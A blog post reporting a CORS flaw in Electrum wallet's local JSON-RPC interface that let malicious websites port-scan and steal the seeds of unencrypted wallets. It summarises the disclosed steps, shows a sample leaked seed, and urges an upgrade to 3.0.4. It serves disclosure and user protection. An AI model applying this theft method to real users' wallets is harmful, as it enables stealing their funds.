A critical vulnerability was just found on Electrum Bitcoin Wallet
What's this vulnerability ?
Just one day ago a Github user taviso reported a serious vulnerability in Electrum Bitcoin Wallet. This is a very serious security bug which allows an attacker to steal your Electrum wallet seed via a simple browser and java script. The attacker can only steal your seed if you left your wallet unprotected without encrypting it.
How does it work ?
On the Electrum's github issue page he shows how it is possible to steal Electrum wallet seed --
- He Installed Electrum 3.0.3 on Windows.
- Created a new wallet with all default settings. He left the wallet not encrypted with password- the default setting.
- Visited in Chrome. Now, it's time to guess the right port number. He used JSON RPC server by default. It does use a random port but a website (run by an attacker) can simply scan for the right port in seconds.
- After a few seconds he succeeded to guesses the right port, and then an alert() appeared with: seed: {"id": 0.7398595146147573, "result": "pony south strike horror throw acquire able afford pen lunch monster runway", "jsonrpc": "2.0"}
Am I at risk ?
Yes, you're at risk if you're currently using 3.0.3 or, any older version of Electrum Wallet. And the most important thing is that if you're using your Electrum wallet without encrypted it with password.
How to fix this issue ?
Electrum developer team is very aware of this serious vulnerability and has just provided a solution.
Electrum has just released a newer version with this vulnerability fixed. Everyone ... please, download the newer version 3.0.4 from their official website. And must check the PGP signature:
Download newer version 3.0.4 : https://electrum.org/#download
Release notes : https://github.com/spesmilo/electrum/blob/3.0.4/RELEASE-NOTES
Release notes of Electrum Wallet Version 3.0.4
Release 3.0.4 : (Security update)
- Fix a vulnerability caused by Cross-Origin Resource Sharing (CORS)
in the JSONRPC interface. Previous versions of Electrum are
vulnerable to port scanning and deanonimization attacks from
malicious websites. Wallets that are not password-protected are
vulnerable to theft. - Bundle QR scanner with Android app
- Minor bug fixes
follow me on steemit 
AND resteem it 
>>Thanks to @elyaque for designing my badges :)<<
MY STATS
REPUTATION SCORE : 69.2 | TOTAL FOLLOWERS : 1451
TOTAL BLOG POSTS : 711 | TOTAL LIKES : 50588
TOTAL EARNINGS : $10281.59 SBD
Donate Bitcoin : 1BTyRFatTrSjFk8nE1cxcWeppf73k4SVTL
Donate Bitcoin Cash : 1BTyRFatTrSjFk8nE1cxcWeppf73k4SVTL
Donate Bitcoin Gold : GUJtqNuqSi42LDS59xH53Gzijpttnh9mpo
Donate Bitcore : 1Fb7bXoNCLyDTRNDxr3oKM2a34h5jqSm8M
Donate Super Bitcoin : 1BTyRFatTrSjFk8nE1cxcWeppf73k4SVTL
It says to hold your coins in your wallet to be safe and this kind of things happens. The only thing i hate about crypto that you are not really safe :(
Thanks! Upvoted because everyone needs to know. I have a password on mine, so I guess I'm relatively safe but will upgrade anyways.
!originalworks :)
The @OriginalWorks bot has determined this post by @royalmacro to be original material and upvoted it!
To call @OriginalWorks, simply reply to any post with @originalworks or !originalworks in your message!
Thismazing post has been received 75% upvote from @ripa on behalf of Helpforhelp projects (Thanks for sharing such a nice post).
Helpforhelp are promising projects.You may like to co-operate us( https://steemit.com/blog/@ripa/helpforhelp-is-a-promising-project-to-help-the-distress-people ) a